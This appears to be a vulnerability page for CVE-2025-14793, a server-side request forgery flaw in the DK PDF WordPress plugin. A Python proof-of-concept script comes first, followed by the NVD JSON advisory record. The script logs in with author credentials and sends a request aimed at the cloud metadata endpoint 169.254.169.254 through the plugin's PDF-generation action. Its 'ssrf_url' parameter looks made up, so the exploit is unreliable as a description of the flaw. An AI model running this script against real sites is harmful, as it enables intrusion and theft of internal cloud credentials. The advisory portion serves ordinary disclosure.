CVE-2025-14793

import requests from urllib.parse import urlencode # CVE-2025-14793 SSRF PoC for DK PDF WordPress Plugin # Target: WordPress site with DK PDF plugin <= 2.3.0 target_url = "http://target-wordpress-site.com" # Authentication with author-level account login_url = f"{target_url}/wp-login.php" session = requests.Session() # Login credentials credentials = { "log": "author_username", "pwd": "author_password", "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=credentials) # SSRF payload - target internal metadata service or local service ssrf_target = "http://169.254.169.254/latest/meta-data/" # Trigger PDF generation with SSRF payload pdf_generate_url = f"{target_url}/wp-admin/admin-ajax.php" pdf_payload = { "action": "dkpdf_generate", "post_id": "1", "ssrf_url": ssrf_target # Malicious URL injected via addContentToMpdf } response = session.post(pdf_generate_url, data=pdf_payload) print(f"Response Status: {response.status_code}") print(f"Response Content: {response.text}")

{"cve": {"id": "CVE-2025-14793", "sourceIdentifier": "[email protected]", "published": "2026-01-16T07:15:54.623", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The DK PDF – WordPress PDF Generator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3.0 via the 'addContentToMpdf' function. This makes it possible for authenticated attackers, author level and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}, {"lang": "es", "value": "El plugin DK PDF – WordPress PDF Generator para WordPress es vulnerable a falsificación de petición del lado del servidor en todas las versiones hasta e incluyendo la 2.3.0 a través de la función 'addContentToMpdf'. Esto hace posible que atacantes autenticados, con nivel de autor o superior, realicen peticiones web a ubicaciones arbitrarias originadas desde la aplicación web y puede ser utilizado para consultar y modificar información de servicios internos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/modules/PDF/DocumentBuilder.php#L213", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/templates/dkpdf-index.php#L134", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/Frontend/WordPressIntegration.php?marks=22-25#L22", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/PDF/Generator.php?marks=24-56#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440588%40dk-pdf&new=3440588%40dk-pdf&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b062f72a-542c-4212-af83-4faefbf69bd7?source=cve", "source": "[email protected]"}]}}